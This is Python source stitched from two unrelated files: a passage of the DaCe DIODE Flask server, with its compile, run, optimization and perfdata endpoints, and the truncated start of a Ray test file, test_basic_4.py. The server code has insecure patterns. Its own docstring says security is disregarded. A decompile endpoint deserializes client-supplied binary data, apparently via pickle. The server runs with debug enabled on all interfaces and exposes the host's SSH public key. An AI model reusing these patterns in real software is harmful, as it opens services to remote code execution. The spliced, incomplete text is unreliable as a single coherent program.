db_setup(perf_tmp_dir)
elif cmd['operation'] == 'remove_group':
perfdir = ExecutorServer.getPerfdataDir(cmd['cid'])
perfdata_path = os.path.join(perfdir, "perfdata.db")
os.remove(perfdata_path)
os.rmdir(perf_tmp_dir)
elif cmd['operation'] == 'endgroup':
print("Ending group")
from diode.db_scripts.sql_to_json import MergeRuns, Conserver
from dace.config import Config
config_path = cmd['config_path']
with config_lock:
Config.load(config_path)
repetitions = Config.get("execution", "general",
"repetitions")
perf_tmp_dir = ExecutorServer.getPerfdataDir(cmd['cid'])
perfdata_path = os.path.join(perf_tmp_dir, "perfdata.db")
can_path = os.path.join(perf_tmp_dir, 'current.can')
mr = MergeRuns()
mr.mergev2(perfdata_path)
print("Merged into " + perfdata_path)
cons = Conserver()
# TODO: Add sdfgs
cons.conserveAll(
perfdata_path,
can_path,
"",
repetitions,
clear_existing=False)
print("Merged and Conserved!")
self._perfdata_available[cmd['cid']] = can_path
with self._oplock:
del self._task_dict[cmd['index']]
except queue.Empty:
return
def consume(self):
try:
cmd = self._command_queue.get(timeout=3)
if isinstance(cmd, str):
pass
else:
command = cmd['cmd']
print("Got command " + command)
if command == "get_perfdata":
import sqlite3
try:
conn = sqlite3.connect(
self._perfdata_available[cmd['cid']])
except:
self._command_results[cmd[
'ticket']] = "Error: Perfdata not available"
print("Errored-out!")
return
querystring = "SELECT * FROM AnalysisResults "
for_node = cmd['for_node']
for_program = cmd['for_program']
for_supersection = cmd['for_supersection']
for_section = cmd['for_section']
query_list = [('forUnifiedID', for_node), ('forProgram',
for_program),
('forSuperSection', for_supersection),
('forSection', for_section)]
query_values = []
first = True
for x in query_list:
name, val = x
if val is None:
continue
if first:
querystring += " WHERE "
else:
querystring += " AND "
first = False
querystring += name + " = ?"
query_values.append(val)
querystring += ";"
print("querystring: " + str(querystring))
print("tuple: " + str(tuple(query_values)))
c = conn.cursor()
c.execute(querystring, tuple(query_values))
result = c.fetchall()
print("setting result for ticket " + str(cmd['ticket']))
self._command_results[cmd['ticket']] = json.dumps(result)
conn.close()
print("Success reading database")
except queue.Empty:
return
def getExecutionOutput(self, client_id):
import time
ret = None
err_count = 0
while ret is None:
with self._oplock:
try:
ret = self._current_runs[client_id]
del self._current_runs[client_id]
except:
err_count += 1
if err_count < 20: # Give 20 seconds of space for compilation and distribution
time.sleep(1)
continue
def egen():
yield "{'error': 'Failed to get run reference'}"
return egen
return ret
def stop(self):
self._running = False
def lock(self):
self._oplock.acquire()
def unlock(self):
self._oplock.release()
@staticmethod
def getPerfdataDir(client_id):
import tempfile
if not os.path.isdir("perfdata-dir/"):
os.mkdir("perfdata-dir")
tpath = "perfdata-dir/" + client_id
try:
os.mkdir(tpath)
except:
pass
perf_tmp_dir = tpath
return perf_tmp_dir
def addRun(self, client_id, compilation_output_tuple, more_options):
config_path = "./client_configs/" + client_id + ".conf"
if not os.path.isdir("./client_configs/"):
os.mkdir("./client_configs/")
if not os.path.isfile(config_path):
# Config not (yet) available, load default and copy
with config_lock:
from dace.config import Config
Config.load()
Config.save(config_path)
if isinstance(compilation_output_tuple, str):
# Group command
gc = compilation_output_tuple
val = {
'cid': client_id,
'cmd': 'control',
'index': self._run_num,
'operation': None,
'config_path': config_path,
'state': "pending"
}
if gc == "start":
val['operation'] = 'startgroup'
elif gc == "end":
val['operation'] = 'endgroup'
else:
def g():
yield '{ "error": "Unknown group operation" }'
return g
with self._oplock:
self._executor_queue.put(val)
self._task_dict[self._run_num] = val
self._run_num += 1
return
with self._oplock:
val = {
'index': self._run_num,
'type': 'run',
'cid': client_id,
'config_path': config_path,
'cmd': 'run',
'cot': compilation_output_tuple,
'opt': more_options,
'state': 'pending',
'reset-perfdata': False
}
self._executor_queue.put(item=val)
self._task_dict[self._run_num] = val
self._run_num += 1
def error_gen():
yield '{ "error": "Run was scheduled. Please poll until ready or longpoll." }'
return error_gen
def run(self, cot, options):
print("=> Run called")
print("Options: " + str(options))
compilation_output_tuple = cot
runindex = options['index']
config_path = options['config_path']
client_id = options['client_id']
perfopts = options['perfopts']
sdfgs, code_tuples, dace_state = compilation_output_tuple
terminal_queue = queue.Queue()
# Generator used to pass the serial output through (using HTTP1.1. streaming)
def output_feeder(output):
if isinstance(output, str):
# It's already in a usable format
pass
else:
try:
output = output.decode('utf-8')
except UnicodeDecodeError:
# Try again escaping
output = output.decode('unicode_escape')
terminal_queue.put(output)
def runner():
print("Trying to get lock")
with self._run_cv:
print("Run starting")
perfmode = perfopts['mode']
perfcores = perfopts['core_counts']
with config_lock:
from dace.config import Config
Config.load(config_path)
if perfmode == "noperf":
Config.set(
"instrumentation", "enable_papi", value=False)
else:
Config.set(
"instrumentation", "enable_papi", value=True)
Config.set(
"instrumentation", "papi_mode", value=perfmode)
Config.set(
"instrumentation",
"sql_database_file",
value=ExecutorServer.getPerfdataDir(client_id) +
"/perfdata.db")
Config.set(
"instrumentation",
"thread_nums",
value=str(perfcores))
# Check if perfcounters are available
from dace.codegen.instrumentation.papi import PAPISettings, PerfPAPIInfo
ppi = PerfPAPIInfo()
ppi.load_info()
if not ppi.check_counters(
[PAPISettings.perf_default_papi_counters()]):
yield '{"error": "PAPI Counter check failed. Either your machine does not provide the required counters or /proc/sys/kernel/perf_event_paranoid is not set correctly"}'
del self._task_dict[runindex]
self._slot_available = True
return
# Copy the config - this allows releasing the config lock without suffering from potential side effects
copied_config = ConfigCopy(Config._config)
self._slot_available = False
dace_state.set_is_compiled(False)
async_executor = AsyncExecutor(None, True, None, None)
async_executor.autoquit = True
async_executor.executor.output_generator = output_feeder
async_executor.executor.setConfig(copied_config)
async_executor.run_async(dace_state)
async_executor.to_thread_message_queue.put("forcequit")
while async_executor.running_thread.is_alive():
try:
new = terminal_queue.get(block=True, timeout=1)
yield new
except:
# Check if the thread is still running
continue
with self._oplock:
# Delete from the tasklist
del self._task_dict[runindex]
print("Run done, notifying")
self._slot_available = True
return runner
@app.route('/')
def redirect_base():
return redirect(url_for("index", path="index.html"), code=301)
@app.route('/client/<path:path>', methods=['GET'])
def index(path):
"""
This is an http server (on the same port as the REST API).
It serves the files from the 'client'-directory to user agents.
Note: This is NOT intended for production environments and security is disregarded!
"""
return send_from_directory("client", path)
@app.route('/dace/api/v1.0/getPubSSH/', methods=['GET'])
def getPubSSH():
try:
with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as f:
key = f.read()
return jsonify({"pubkey": key})
except:
print("Failed to open keyfile")
traceback.print_exc()
return jsonify({"pubkey": "0"})
@app.route('/dace/api/v1.0/getEnum/<string:name>', methods=['GET'])
def getEnum(name):
"""
Helper function to enumerate available values for `ScheduleType`.
Returns:
enum: List of string-representations of the values in the enum
"""
valid_params = enum_list
if name not in valid_params:
# To protect against arbitrary code execution, this request is refused
print("Enum type '" + str(name) + "' is not in Whitelist")
abort(400)
return jsonify({
'enum': [str(e).split(".")[-1] for e in getattr(dace.dtypes, name)]
})
def collect_all_SDFG_nodes(sdfg):
ret = []
for sid, state in enumerate(sdfg.nodes()):
for nid, node in enumerate(state.nodes()):
ret.append(('s' + str(sid) + '_' + str(nid), node))
return ret
def split_nodeid_in_state_and_nodeid(nodeid):
match = re.match(r"s(\d+)_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), int(ids[1])
else:
match = re.match(r"dummy_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), None
else:
raise ValueError("Node ID " + nodeid + " has the wrong form")
return None
def properties_to_json_list(props):
ret = []
for x, val in props:
try:
typestr = x.dtype.__name__
except:
# Try again, it might be an enum
try:
typestr = x.enum.__name__
except:
typestr = 'None'
# Special case of CodeProperty
if isinstance(x, dace.properties.CodeProperty):
typestr = "CodeProperty"
if val is None:
continue
val = x.to_string(val)
# Special case of DebugInfoProperty: Transcribe to object (this is read-only)
if isinstance(x, dace.properties.DebugInfoProperty):
typestr = "DebugInfo"
if val is None:
continue
nval = {
"filename": val.filename,
"start_line": val.start_line,
"end_line": val.end_line,
"start_col": val.start_column,
"end_col": val.end_column
}
val = json.dumps(nval)
ret.append({
"name": str(x.attr_name),
"desc": str(x.desc),
"type": typestr,
"default": str(x.default),
"value": str(val)
})
return ret
def set_properties_from_json(obj, prop, sdfg=None):
if prop['default'] == "None" and sdfg is None:
# This dropout is only valid for transformations
# Properties without a default are transformation-generic and should not be settable.
pass
else:
# Catching some transcription errors
val = prop['value'] == 'True' if prop['type'] == 'bool' else prop[
'value']
if any(map(lambda x: x in prop['type'], enum_list)):
# This is an enum. If the value was fully qualified, it needs to be trimmed
if '.' in val:
val = val.split('.')[-1]
dace.properties.set_property_from_string(
prop['name'], obj, json.dumps(val), sdfg, from_json=True)
def applySDFGProperty(sdfg, property_element, step=None):
try:
prop_step = int(property_element['step'])
except:
print("[Warning] Prop step was not provided")
prop_step = 0
print("applySDFGProperty: step " + str(step) + ", prop_step: " +
str(prop_step))
if step is not None and prop_step != step:
# Step mismatch; ignore
return sdfg
sid = int(property_element['state_id'])
nid = int(property_element['node_id'])
node = sdfg.find_node(sid, nid)
for prop in property_element['params']:
set_properties_from_json(node, prop, sdfg)
return sdfg
def applySDFGProperties(sdfg, properties, step=None):
for x in properties:
applySDFGProperty(sdfg, x, step)
return sdfg
def applyOptPath(sdfg, optpath, useGlobalSuffix=True, sdfg_props=[]):
# Iterate over the path, applying the transformations
global_counter = {}
if sdfg_props is None: sdfg_props = []
step = 0
for x in optpath:
optimizer = SDFGOptimizer(sdfg, inplace=True)
matching = optimizer.get_pattern_matches()
# Apply properties (will automatically apply by step-matching)
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
for pattern in matching:
name = type(pattern).__name__
if useGlobalSuffix:
if name in global_counter:
global_counter[name] += 1
else:
global_counter[name] = 0
tmp = global_counter[name]
if tmp > 0:
name += "$" + str(tmp)
if name == x['name']:
#for prop in x['params']['props']:
#if prop['name'] == 'subgraph': continue
#set_properties_from_json(pattern, prop, sdfg)
set_properties_from_json(
pattern, x['params']['props'], context={'sdfg': sdfg})
pattern.apply_pattern(sdfg)
if not useGlobalSuffix:
break
step += 1
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
return sdfg
def create_DaceState(code, sdfg_dict, errors):
dace_state = None
try:
dace_state = DaceState(code, "fake.py", headless=True)
for x in dace_state.sdfgs:
name, sdfg = x
sdfg_dict[name] = sdfg
return dace_state
except SyntaxError as se:
# Syntax error
errors.append({
'type': "SyntaxError",
'line': se.lineno,
'offset': se.offset,
'text': se.text,
'msg': se.msg
})
except ValueError as ve:
# DACE-Specific error
tb = traceback.format_exc()
errors.append({
'type': "ValueError",
'stringified': str(ve),
'traceback': tb
})
except Exception as ge:
# Generic exception
tb = traceback.format_exc()
errors.append({
'type': ge.__class__.__name__,
'stringified': str(ge),
'traceback': tb
})
return dace_state
def compileProgram(request, language, perfopts=None):
if not request.json or (('code' not in request.json) and
('sdfg' not in request.json)):
print("[Error] No input code provided, cannot continue")
abort(400)
errors = []
try:
optpath = request.json['optpath']
except:
optpath = None
try:
sdfg_props = request.json['sdfg_props']
except:
sdfg_props = None
if perfopts is None:
try:
perf_mode = request.json['perf_mode']
except:
perf_mode = None
else:
#print("Perfopts: " + str(perfopts))
perf_mode = perfopts
client_id = request.json['client_id']
sdfg_dict = {}
sdfg_eval_order = []
with config_lock: # Lock the config - the config may be modified while holding this lock, but the config MUST be restored.
from dace.config import Config
config_path = "./client_configs/" + client_id + ".conf"
if os.path.isfile(config_path):
Config.load(config_path)
else:
Config.load()
if perf_mode is not None:
tmp = perf_mode['mode']
if tmp != 'noperf':
Config.set(
"instrumentation",
"enable_papi",
value=True,
autosave=False)
Config.set(
"instrumentation",
"papi_mode",
value=perf_mode['mode'],
autosave=False)
print("Set perfmode to " + perf_mode['mode'])
else:
Config.set(
"instrumentation",
"enable_papi",
value=False,
autosave=False)
dace_state = None
in_sdfg = None
if "sdfg" in request.json:
in_sdfg = request.json['sdfg']
if isinstance(in_sdfg, list):
if len(in_sdfg) > 1:
print("More than 1 sdfg provided!")
raise Exception("#TODO: Allow multiple sdfg inputs")
in_sdfg = in_sdfg[0]
if isinstance(in_sdfg, str):
in_sdfg = json.loads(in_sdfg)
if isinstance(in_sdfg, dict):
# Generate callbacks (needed for elements referencing others)
def loader_callback(name: str):
# Check if already available and if yes, return it
if name in sdfg_dict:
return sdfg_dict[name]
# Else: This function has to recreate the given sdfg
sdfg_dict[name] = dace.SDFG.from_json(
in_sdfg[name], {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(name)
return sdfg_dict[name]
for k, v in in_sdfg.items():
# Leave it be if the sdfg was already created
# (this might happen with SDFG references)
if k in sdfg_dict: continue
if isinstance(v, str):
v = json.loads(v)
sdfg_dict[k] = dace.SDFG.from_json(
v, {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(k)
else:
in_sdfg = dace.SDFG.from_json(in_sdfg)
sdfg_dict[in_sdfg.name] = in_sdfg
else:
print("Using code to compile")
code = request.json['code']
if (isinstance(code, list)):
if len(code) > 1:
print("More than 1 code file provided!")
abort(400)
code = code[0]
if language == "octave":
statements = octave_frontend.parse(code, debug=False)
statements.provide_parents()
statements.specialize()
sdfg = statements.generate_code()
sdfg.set_sourcecode(code, "matlab")
elif language == "dace":
dace_state = create_DaceState(code, sdfg_dict, errors)
# The DaceState uses the variable names in the dace code. This is not useful enough for us, so we translate
copied_dict = {}
for k, v in sdfg_dict.items():
copied_dict[v.name] = v
sdfg_dict = copied_dict
if len(errors) == 0:
if optpath is not None:
for sdfg_name, op in optpath.items():
try:
sp = sdfg_props[sdfg_name]
except:
# In any error case, just ignore the properties
sp = None
print("Applying opts for " + sdfg_name)
print("Dict: " + str(sdfg_dict.keys()))
sdfg_dict[sdfg_name] = applyOptPath(
sdfg_dict[sdfg_name], op, sdfg_props=sp)
code_tuple_dict = {}
# Deep-copy the SDFG (codegen may change the SDFG it operates on)
codegen_sdfgs = copy.deepcopy(sdfg_dict)
codegen_sdfgs_dace_state = copy.deepcopy(sdfg_dict)
if len(errors) == 0:
from dace.codegen import codegen
if sdfg_eval_order != []:
sdfg_eval_order.reverse()
for x in sdfg_eval_order:
s = codegen_sdfgs[x]
code_tuple_dict[x] = codegen.generate_code(s)
else:
for n, s in codegen_sdfgs.items():
code_tuple_dict[n] = codegen.generate_code(s)
if dace_state is None:
if "code" in request.json:
in_code = request.json['code']
else:
in_code = ""
dace_state = DaceState(in_code, "tmp.py", headless=True)
dace_state.set_sdfg(
list(codegen_sdfgs_dace_state.values())[0],
list(codegen_sdfgs_dace_state.keys())[0])
if len(dace_state.errors) > 0:
print("ERRORS: " + str(dace_state.errors))
errors.extend(dace_state.errors)
# The config won't save back on its own, and we don't want it to - these changes are transient
if len(errors) > 0:
return errors
# Only return top-level SDFG
return ({k: v
for k, v in sdfg_dict.items()
if v.parent is None}, code_tuple_dict, dace_state)
#return sdfg_dict, code_tuple_dict, dace_state
def get_transformations(sdfgs):
opt_per_sdfg = {}
for sdfg_name, sdfg in sdfgs.items():
opt = SDFGOptimizer(sdfg)
ptrns = opt.get_pattern_matches()
optimizations = []
for p in ptrns:
label = type(p).__name__
nodeids = []
properties = []
if p is not None:
sid = p.state_id
nodes = list(p.subgraph.values())
for n in nodes:
nodeids.append([sid, n])
properties = dace.serialize.all_properties_to_json(p)
optimizations.append({
'opt_name': label,
'opt_params': properties,
'affects': nodeids,
'children': []
})
opt_per_sdfg[sdfg_name] = {'matching_opts': optimizations}
return opt_per_sdfg
@app.route(
"/dace/api/v1.0/<string:filegroup>/download/<string:client_id>/",
methods=['GET'])
def perfdata_download(filegroup, client_id):
"""
This function returns the perfdata as a download
"""
filepath = ExecutorServer.getPerfdataDir(client_id) + (
"/perfdata.db" if filegroup == "perfdata" else "/current.can")
if not os.path.isfile(filepath):
print("File not existent, cannot download")
abort(400)
return send_file(
filepath,
"application/x-sqlite3",
as_attachment=True,
attachment_filename="perfdata.sqlite3"
if filegroup == "perfdata" else "current.can.sqlite3",
conditional=True)
@app.route("/dace/api/v1.0/<string:filegroup>/reset/", methods=['POST'])
def perfdata_delete(filegroup):
"""
Resets (deletes) the currently accumulated perfdata.
POST-Parameters:
client_id: string. The client id
"""
try:
client_id = request.json['client_id']
except:
print("Client id not specified, cannot continue")
abort(400)
filepath = ExecutorServer.getPerfdataDir(client_id) + (
"/perfdata.db" if filegroup == "perfdata" else "/current.can")
if os.path.isfile(filepath):
os.remove(filepath)
return Response("ok")
@app.route("/dace/api/v1.0/perfdata/roofline/", methods=['POST'])
def perfdata_roofline():
"""
Returns data for roofline from the accumulated data.
POST-Parameters:
client_id: string. The client id
"""
from dace.codegen.instrumentation.papi import PAPIInstrumentation
try:
client_id = request.json['client_id']
except:
print("Client id not specified, cannot continue")
abort(400)
filepath = ExecutorServer.getPerfdataDir(client_id) + "/current.can"
retdict = PAPIInstrumentation.get_roofline_data(filepath)
return jsonify(retdict)
@app.route("/dace/api/v1.0/perfdata/get/", methods=['POST'])
def perfdata_query():
"""
This function returns the matching Analysis results from the latest CAN.
NOTE: It does _not_ return the full raw result list. This differs from DIODE1 behavior
POST-Parameters:
client_id: string. The client id
analysis_name: string. The name of the queried analysis
for_program: string or int. The number of the queried program
for_node: string or int. The id of the node
for_supersection: string or int. The number of the queried supersection
for_section: string or int. The number of the queried section.
The server returns a JSON-dict of all matching values.
Omitting a `for_`-Parameter is allowed and excludes this parameter from the filter (matches anything).
The client id is required.
"""
try:
client_id = request.json['client_id']
except:
print("Client id not specified, cannot continue")
abort(400)
try:
analysis_name = request.json['analysis_name']
except:
analysis_name = None
try:
for_program = request.json['for_program']
except:
for_program = None
try:
for_node = request.json['for_node']
except:
for_node = None
try:
for_supersection = request.json['for_supersection']
except:
for_supersection = None
try:
for_section = request.json['for_section']
except:
for_section = None
es = es_ref[0]
ticket = es.addCommand({
'cmd': 'get_perfdata',
'cid': client_id,
'analysis_name': analysis_name,
'for_program': for_program,
'for_node': for_node,
'for_supersection': for_supersection,
'for_section': for_section
})
# This should not take too long, so for now, we wait here for the executor the serve the request instead of letting the client poll another address
print("Now waiting for ticket")
ret = es.waitForCommand(ticket)
print("Got the ticket, we're done!")
# jsonify creates a response directly, so we load string => obj first
return jsonify(json.loads(ret))
@app.route("/dace/api/v1.0/dispatcher/<string:op>/", methods=['POST'])
def execution_queue_query(op):
es = es_ref[0]
if op == "list":
# List the currently waiting tasks
retlist = []
for key, val in es._orphaned_runs.items():
tmp = [''.join(x) for x in val]
for x in tmp:
d = {}
d['index'] = '(done)'
d['type'] = 'orphan'
d['client_id'] = key
d['state'] = 'orphaned'
d['output'] = str(x)
retlist.append(d)
for key, val in es._task_dict.items():
d = {}
if val['cmd'] == 'run':
d['index'] = key
d['type'] = 'run'
d['client_id'] = val['cid']
d['options'] = val['opt']
d['state'] = val['state']
elif val['cmd'] == 'control':
d['index'] = key
d['type'] = 'command'
d['client_id'] = val['cid']
d['options'] = val['operation']
d['state'] = val['state']
retlist.append(d)
ret = {}
ret['elements'] = retlist
return jsonify(ret)
else:
print("Error: op " + str(op) + " not implemented")
abort(400)
@app.route('/dace/api/v1.0/run/status/', methods=['POST'])
def get_run_status():
if not request.json or not 'client_id' in request.json:
print("[Error] No client id provided, cannot continue")
abort(400)
es = es_ref[0]
# getExecutionOutput returns a generator to output to a HTTP1.1 stream
outputgen = es.getExecutionOutput(request.json['client_id'])
return Response(outputgen(), mimetype='text/text')
@app.route('/dace/api/v1.0/run/', methods=['POST'])
def run():
"""
This function is equivalent to the old DIODE "Run"-Button.
POST-Parameters:
(Same as for compile(), language defaults to 'dace')
perfmodes: list including every queried mode
corecounts: list of core counts (one run for every number of cores)
"""
try:
perfmodes = request.json['perfmodes']
except:
perfmodes = ["noperf"]
try:
corecounts = request.json['corecounts']
except:
corecounts = [0]
try:
repetitions = request.json['repetitions']
except:
repetitions = 1
# Obtain the reference
es = es_ref[0]
client_id = request.json['client_id']
es.addRun(client_id, "start", {})
for pmode in perfmodes:
perfopts = {
'mode': pmode,
'core_counts': corecounts,
'repetitions': repetitions
}
tmp = compileProgram(request, 'dace', perfopts)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# ERROR
print("An error occurred")
abort(400)
dace_state.repetitions = repetitions
more_options = {}
more_options['perfopts'] = perfopts
runner = es.addRun(client_id, (sdfgs, code_tuples, dace_state),
more_options)
es.addRun(client_id, "end", {})
# There is no state information with this, just the output
# It might be necessary to add a special field that the client has to filter out
# to provide additional state information
return Response(runner(), mimetype="text/text")
@app.route('/dace/api/v1.0/match_optimizer_patterns/', methods=['POST'])
def optimize():
"""
Returns a list of possible optimizations (transformations) and their properties.
POST-Parameters:
input_code: list. Contains all necessary input code files
[opt] optpath: list of dicts, as { name: <str>, params: <dict> }. Contains the current optimization path/tree.
This optpath is applied to the provided code before evaluating possible pattern matches.
client_id: <string>: For later identification. May be unique across all runs,
must be unique across clients
Returns:
matching_opts: list of dicts, as { opt_name: <str>, opt_params: <dict>, affects: <list>, children: <recurse> }.
Contains the matching transformations.
`affects` is a list of affected node ids, which must be unique in the current program.
"""
tmp = compileProgram(request, 'dace')
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opt_per_sdfg = get_transformations(sdfgs)
return jsonify(opt_per_sdfg)
@app.route('/dace/api/v1.0/compile/<string:language>', methods=['POST'])
def compile(language):
"""
POST-Parameters:
sdfg: ser. sdfg: Contains the root SDFG, serialized in JSON-string. If set, options `code` and `sdfg_props` are taken from this value.
Can be a list of SDFGs.
NOTE: If specified, `code`, `sdfg_prop`, and `language` (in URL) are ignored.
code: string/list. Contains all necessary input code files
[opt] optpath: list of dicts, as { <sdfg_name/str>: { name: <str>, params: <dict> }}. Contains the current optimization path/tree.
This optpath is applied to the provided code before compilation
[opt] sdfg_props: list of dicts, as { <sdfg_name/str>: { state_id: <str>, node_id: <str>, params: <dict>, step: <opt int>}}. Contains changes to the default SDFG properties.
The step element of the dicts is optional. If it is provided, it specifies the number
of optpath elements that preceed it. E.g. a step value of 0 means that the property is applied before the first optimization.
If it is omitted, the property is applied after all optimization steps, i.e. to the resulting SDFG
[opt] perf_mode: string. Providing "null" has the same effect as omission. If specified, enables performance instrumentation with the counter set
provided in the DaCe settings. If null (or omitted), no instrumentation is enabled.
client_id: <string>: For later identification. May be unique across all runs,
must be unique across clients
Returns:
sdfg: object. Contains a serialization of the resulting SDFGs.
generated_code: string. Contains the output code
sdfg_props: object. Contains a dict of all properties for
every existing node of the sdfgs returned
in the sdfg field
"""
tmp = None
try:
tmp = compileProgram(request, language)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opts = get_transformations(sdfgs)
compounds = {}
for n, s in sdfgs.items():
compounds[n] = {
"sdfg": s.to_json(),
"matching_opts": opts[n]['matching_opts'],
"generated_code": [*map(lambda x: x.code, code_tuples[n])]
}
return jsonify({"compounds": compounds})
except Exception as e:
return jsonify({'error': str(e), 'traceback': traceback.format_exc()})
@app.route('/dace/api/v1.0/decompile/<string:obj>/', methods=['POST'])
def decompile(obj):
"""
De-compiles (pickles) an SDFG in python binary format.
POST-Parameters:
binary: base64 string. The object to pickle (the URL encodes the expected type).
"""
import base64, pickle
try:
b64_data = request.json['binary']
decoded = base64.decodebytes(b64_data.encode())
except:
abort(Response("Invalid input", 400))
if obj == "SDFG":
loaded_sdfg = ""
from dace.sdfg import SDFG
try:
loaded_sdfg = SDFG.from_bytes(decoded)
except:
abort(Response("The provided file is not a valid SDFG", 400))
# With the SDFG decoded, we must adhere to the output format of compile() for the best interoperability
sdfg_name = loaded_sdfg.name
opts = get_transformations({sdfg_name: loaded_sdfg})
from dace.codegen import codegen
gen_code = codegen.generate_code(loaded_sdfg)
return jsonify({
"compounds": {
sdfg_name: {
'input_code': loaded_sdfg.sourcecode,
'sdfg': json.dumps(loaded_sdfg.to_json()),
'matching_opts': opts[sdfg_name]['matching_opts'],
'generated_code': [*map(lambda x: x.code, gen_code)]
}
}
})
else:
print("Invalid object type '" + obj + "' specified for decompilation")
abort(400)
@app.route('/dace/api/v1.0/diode/themes', methods=['GET'])
def get_available_ace_editor_themes():
import glob, os.path
path = "./client/external_lib/ace/"
files = [f for f in glob.glob(path + "theme-*.js")]
filenames = map(os.path.basename, files)
return jsonify([*filenames])
def get_settings(client_id, name="", cv=None, config_path=""):
from dace.config import Config
if cv is None:
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
if cv is None:
cv = Config.get()
ret = {}
for i, (cname, cval) in enumerate(sorted(cv.items())):
cpath = tuple(list(config_path) + [cname])
try:
meta = Config.get_metadata(*cpath)
# A dict contains more elements
if meta['type'] == 'dict':
ret[cname] = {
"value": get_settings(client_id, cname, cval, cpath),
"meta": meta
}
continue
# Other values can be included directly
ret[cname] = {"value": cval, "meta": meta}
except KeyError:
print('WARNING: No metadata for configuration key', cpath)
return ret
def set_settings(settings_array, client_id):
from dace.config import Config
if not os.path.isdir("./client_configs"):
os.mkdir("./client_configs/")
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
for path, val in settings_array.items():
path = path.split("/")
Config.set(*path, value=val)
Config.save(clientpath)
@app.route('/dace/api/v1.0/preferences/<string:operation>', methods=['POST'])
def diode_settings(operation):
if operation == "get":
client_id = request.json['client_id']
return jsonify(get_settings(client_id))
elif operation == "set":
print("request.data: " + str(request.data))
settings = request.json
client_id = settings['client_id']
del settings['client_id']
return jsonify(set_settings(settings, client_id))
else:
return jsonify({"error": "Unsupported operation"})
@app.route('/dace/api/v1.0/status', methods=['POST'])
def status():
# just a kind of ping/pong to see if the server is running
return "OK"
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--localhost",
action="store_true",
help="Bind to localhost only")
parser.add_argument(
"-ld",
"--localdace",
action="store_true",
help="Use local commands instead of ssh")
parser.add_argument(
"-rd",
"--restoredace",
action="store_true",
help="Restore the backup file")
parser.add_argument("-p", "--port", type=int, help="Port to listen on")
args = parser.parse_args()
if args.restoredace:
from dace.config import Config
Config.load("./dace.conf.bak")
Config.save()
if args.localdace:
from dace.config import Config
Config.load()
Config.save("./dace.conf.bak")
Config.load()
Config.set(
"execution",
"general",
"execcmd",
value='${command}',
autosave=True)
Config.set(
"execution",
"general",
"copycmd_r2l",
value='cp ${srcfile} ${dstfile}',
autosave=True)
Config.set(
"execution",
"general",
"copycmd_l2r",
value='cp ${srcfile} ${dstfile}',
autosave=True)
if not os.path.isdir("./client_configs"):
os.mkdir("./client_configs")
Config.save("./client_configs/default.conf")
es = ExecutorServer()
es_ref.append(es)
app.run(
host='localhost' if args.localhost else "0.0.0.0",
debug=True,
port=args.port,
use_reloader=False)
es.stop()
else:
# Start the executor server
es = ExecutorServer()
es_ref.append(es)
import atexit
def tmp():
es.stop()
atexit.register(tmp)
|
test_basic_4.py
|
# coding: utf-8
import logging
import sys
import time
import subprocess
import numpy as np
import pytest
import ray.cluster_utils
from ray._private.gcs_pubsub import gcs_pubsub_enabled, GcsFunctionKeySubscriber
from ray._private.test_utils import wait_for_condition
from ray.autoscaler._private.constants import RAY_PROCESSES
from pathlib import Path
import ray
import psutil
logger = logging.getLogger(__name__)
def test_actor_scheduling(shutdown_only):
ray.init()
@ray.remote
class A:
def run_fail(self):
ray.actor.exit_actor()
def get(self):
return 1
a = A.remote()
a.run_fail.remote()
with pytest.raises(Exception):
ray.get([a.get.remote()])
def test_worker_startup_count(ray_start_cluster):
"""Test that no extra workers started while no available cpu resources
in cluster."""
cluster = ray_start_cluster
# Cluster total cpu resources is 4.
cluster.add_node(
num_cpus=4,
_system_config={
"debug_dump_period_milliseconds": 100,
},
)
ray.init(address=cluster.address)
# A slow function never returns. It will hold cpu resources all the way.
@ray.remote
def slow_function():
while True:
time.sleep(1000)
# Flood a large scale lease worker requests.
for i in range(10000):
# Use random cpu resources to make sure that all tasks are sent
# to the raylet. Because core worker will cache tasks with the
# same resource shape.
num_cpus = 0.24 + np.random.uniform(0, 0.01)
slow_function.options(num_cpus=num_cpus).remote()
# Check "debug_state.txt" to ensure no extra workers were started.
session_dir = ray.worker.global_worker.node.address_info["session_dir"]
session_path = Path(session_dir)
debug_state_path = session_path / "logs" / "debug_state.txt"
def get_num_workers():
with open(debug_state_path) as f:
for line in f.readlines():
num_workers_prefix = "- num PYTHON workers: "
if num_workers_prefix in line:
num_workers = int(line[len(num_workers_prefix) :])
return num_workers
return None
# Wait for "debug_state.txt" to be updated to reflect the started worker.
timeout_limit = 15
start = time.time()
wait_for_condition(lambda: get_num_workers() == 16, timeout=timeout_limit)
time_waited = time.time() - start
print(f"Waited {time_waited} for debug_state.txt to be updated")
# Check that no more workers started for a while.
for i in range(100):
# Sometimes the debug state file can be empty. Retry if needed.
for _ in range(3):
num = get_num_workers()
if num is None:
print("Retrying parse debug_state.txt")
time.sleep(0.05)
else:
break
assert num == 16
time.sleep(0.1)
def test_function_unique_export(ray_start_regular):
@ray.remote
def f():
pass
@ray.remote
def g():
ray.get(f.remote())
if gcs_pubsub_enabled():
subscriber = GcsFunctionKeySubscriber(
address=ray.worker.global_worker.gcs_client.address
)
subscriber.subscribe()
ray.get(g.remote())
# Poll pubsub channel for messages generated from running task g().
num_exports = 0
while True:
key = subscriber.poll(timeout=1)
if key is None:
break
else:
num_exports += 1
print(f"num_exports after running g(): {num_exports}")
ray.get([g.remote() for _ in range(5)])
key = subscriber.poll(timeout=1)
assert key is None, f"Unexpected function key export: {key}"
else:
ray.get(g.remote())
num_exports = ray.worker.global_worker.redis_client.llen("Exports")
